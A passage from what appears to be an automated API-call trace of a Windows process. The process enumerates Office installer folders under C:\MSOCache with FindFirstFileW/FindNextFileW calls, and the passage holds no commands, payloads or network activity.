cAlternateFileName="")) returned 0x6f5058 [0071.061] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b4c8 | out: lpFindFileData=0x70b4c8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc8822a7d, dwReserved1=0x24a39153, cFileName="..", cAlternateFileName="")) returned 1 [0071.133] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.133] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b4c8 | out: lpFindFileData=0x70b4c8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc8822a7d, dwReserved1=0x24a39153, cFileName="Proof.en", cAlternateFileName="")) returned 1 [0071.133] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.133] lstrlenW (lpString="Proof.en") returned 8 [0071.133] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*", lpFindFileData=0x70c160 | out: lpFindFileData=0x70c160*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x6f57c8 [0071.133] FindNextFileW (in: hFindFile=0x6f57c8, lpFindFileData=0x70c160 | out: lpFindFileData=0x70c160*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0071.133] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.133] FindNextFileW (in: hFindFile=0x6f57c8, lpFindFileData=0x70c160 | out: lpFindFileData=0x70c160*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x219b4a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x219b4a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf07b1ad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xaf35ed, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0071.133] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.133] lstrlenW (lpString="Proof.cab") returned 9 [0071.133] FindClose (in: hFindFile=0x6f57c8 | out: hFindFile=0x6f57c8) returned 1 [0071.133] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c160 | out: hHeap=0x6d0000) returned 1 [0071.133] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b4c8 | out: lpFindFileData=0x70b4c8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc8822a7d, dwReserved1=0x24a39153, cFileName="Proof.es", cAlternateFileName="")) returned 1 [0071.134] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.134] lstrlenW (lpString="Proof.es") returned 8 [0071.134] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*", lpFindFileData=0x70c160 | out: lpFindFileData=0x70c160*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x70cf30 [0071.134] FindNextFileW (in: hFindFile=0x70cf30, lpFindFileData=0x70c160 | out: lpFindFileData=0x70c160*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4d53d90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf4f690d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0071.134] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.134] FindNextFileW (in: hFindFile=0x70cf30, lpFindFileData=0x70c160 | out: lpFindFileData=0x70c160*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf4f690d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd02aea, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0071.134] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.134] lstrlenW (lpString="Proof.cab") returned 9 [0071.134] FindClose (in: hFindFile=0x70cf30 | out: hFindFile=0x70cf30) returned 1 [0071.134] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c160 | out: hHeap=0x6d0000) returned 1 [0071.134] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b4c8 | out: lpFindFileData=0x70b4c8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc8822a7d, dwReserved1=0x24a39153, cFileName="Proof.fr", cAlternateFileName="")) returned 1 [0071.134] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.134] lstrlenW (lpString="Proof.fr") returned 8 [0071.134] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*", lpFindFileData=0x70c160 | out: lpFindFileData=0x70c160*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x70cf30 [0071.135] FindNextFileW (in: hFindFile=0x70cf30, lpFindFileData=0x70c160 | out: lpFindFileData=0x70c160*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf30772d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf30772d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0071.135] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.135] FindNextFileW (in: hFindFile=0x70cf30, lpFindFileData=0x70c160 | out: lpFindFileData=0x70c160*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x35aa7000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x35aa7000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf3076b00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1416b54, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0071.135] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.135] lstrlenW (lpString="Proof.cab") returned 9 [0071.135] FindClose (in: hFindFile=0x70cf30 | out: hFindFile=0x70cf30) returned 1 [0071.135] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c160 | out: hHeap=0x6d0000) returned 1 [0071.135] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b4c8 | out: lpFindFileData=0x70b4c8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x40650500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x40650500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf0126df0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0xc8822a7d, dwReserved1=0x24a39153, cFileName="Proofing.msi", cAlternateFileName="")) returned 1 [0071.135] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.135] lstrlenW (lpString="Proofing.msi") returned 12 [0071.135] FindClose (in: hFindFile=0x6f5058 | out: hFindFile=0x6f5058) returned 1 [0071.135] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b4c8 | out: hHeap=0x6d0000) returned 1 [0071.135] FindNextFileW (in: hFindFile=0x6f5018, lpFindFileData=0x709030 | out: lpFindFileData=0x709030*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0043-0409-1000-0000000FF1CE}-C", cAlternateFileName="{95310~1")) returned 1 [0071.135] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.135] lstrlenW (lpString="{90140000-0043-0409-1000-0000000FF1CE}-C") returned 40 [0071.136] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5058 [0071.146] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.146] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.146] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32MUI.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0071.146] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.146] lstrlenW (lpString="Office32MUI.msi") returned 15 [0071.146] FindClose (in: hFindFile=0x6f5058 | out: hFindFile=0x6f5058) returned 1 [0071.147] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3d8 | out: hHeap=0x6d0000) returned 1 [0071.147] FindNextFileW (in: hFindFile=0x6f5018, lpFindFileData=0x709030 | out: lpFindFileData=0x709030*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0044-0409-1000-0000000FF1CE}-C", cAlternateFileName="{91454~1")) returned 1 [0071.147] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.147] lstrlenW (lpString="{90140000-0044-0409-1000-0000000FF1CE}-C") returned 40 [0071.147] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5058 [0071.151] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.151] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.151] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf79111d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1200204, dwReserved0=0x0, dwReserved1=0x0, cFileName="InfLR.cab", cAlternateFileName="")) returned 1 [0071.151] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.151] lstrlenW (lpString="InfLR.cab") returned 9 [0071.177] FindClose (hFindFile=0x6f5058) [0071.177] FindClose (in: hFindFile=0x6f5058 | out: hFindFile=0x6f5058) returned 1 [0071.179] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3d8 | out: hHeap=0x6d0000) returned 1 [0071.179] FindNextFileW (in: hFindFile=0x6f5018, lpFindFileData=0x709030 | out: lpFindFileData=0x709030*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0054-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9EA85~1")) returned 1 [0071.179] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.179] lstrlenW (lpString="{90140000-0054-0409-1000-0000000FF1CE}-C") returned 40 [0071.179] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5058 [0071.179] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.179] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.179] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f356eb0, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f356eb0, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1861, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0071.179] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.179] lstrlenW (lpString="Setup.xml") returned 9 [0071.180] FindClose (in: hFindFile=0x6f5058 | out: hFindFile=0x6f5058) returned 1 [0071.180] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3d8 | out: hHeap=0x6d0000) returned 1 [0071.180] FindNextFileW (in: hFindFile=0x6f5018, lpFindFileData=0x709030 | out: lpFindFileData=0x709030*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00A1-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92572~1")) returned 1 [0071.180] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.180] lstrlenW (lpString="{90140000-00A1-0409-1000-0000000FF1CE}-C") returned 40 [0071.180] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5058 [0071.207] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.207] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.218] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5914a30, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneNoteMUI.msi", cAlternateFileName="ONENOT~1.MSI")) returned 1 [0071.218] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.218] lstrlenW (lpString="OneNoteMUI.msi") returned 14 [0071.219] FindClose (in: hFindFile=0x6f5058 | out: hFindFile=0x6f5058) returned 1 [0071.219] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3d8 | out: hHeap=0x6d0000) returned 1 [0071.219] FindNextFileW (in: hFindFile=0x6f5018, lpFindFileData=0x709030 | out: lpFindFileData=0x709030*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00B4-0409-1000-0000000FF1CE}-C", cAlternateFileName="{912E0~1")) returned 1 [0071.219] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.219] lstrlenW (lpString="{90140000-00B4-0409-1000-0000000FF1CE}-C") returned 40 [0071.219] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5058 [0071.276] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.296] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.296] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x308ae9f0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x308ae9f0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b55ce0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x265400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProjectMUI.msi", cAlternateFileName="PROJEC~1.MSI")) returned 1 [0071.296] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.296] lstrlenW (lpString="ProjectMUI.msi") returned 14 [0071.296] FindClose (in: hFindFile=0x6f5058 | out: hFindFile=0x6f5058) returned 1 [0071.297] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3d8 | out: hHeap=0x6d0000) returned 1 [0071.297] FindNextFileW (in: hFindFile=0x6f5018, lpFindFileData=0x709030 | out: lpFindFileData=0x709030*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00BA-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~4")) returned 1 [0071.297] WaitForSingleObject (hHandle=0xbc, dwMilliseconds=0x0) returned 0x102 [0071.297] lstrlenW (lpString="{90140000-00BA-0409-1000-0000000FF1CE}-C") returned 40 [0071.297] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f5058 [0071.305] FindNextFileW (in: hFindFile=0x6f5058, lpFindFileData=0x70b3d8 | out: lpFindFileData=0x70b3d8*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, 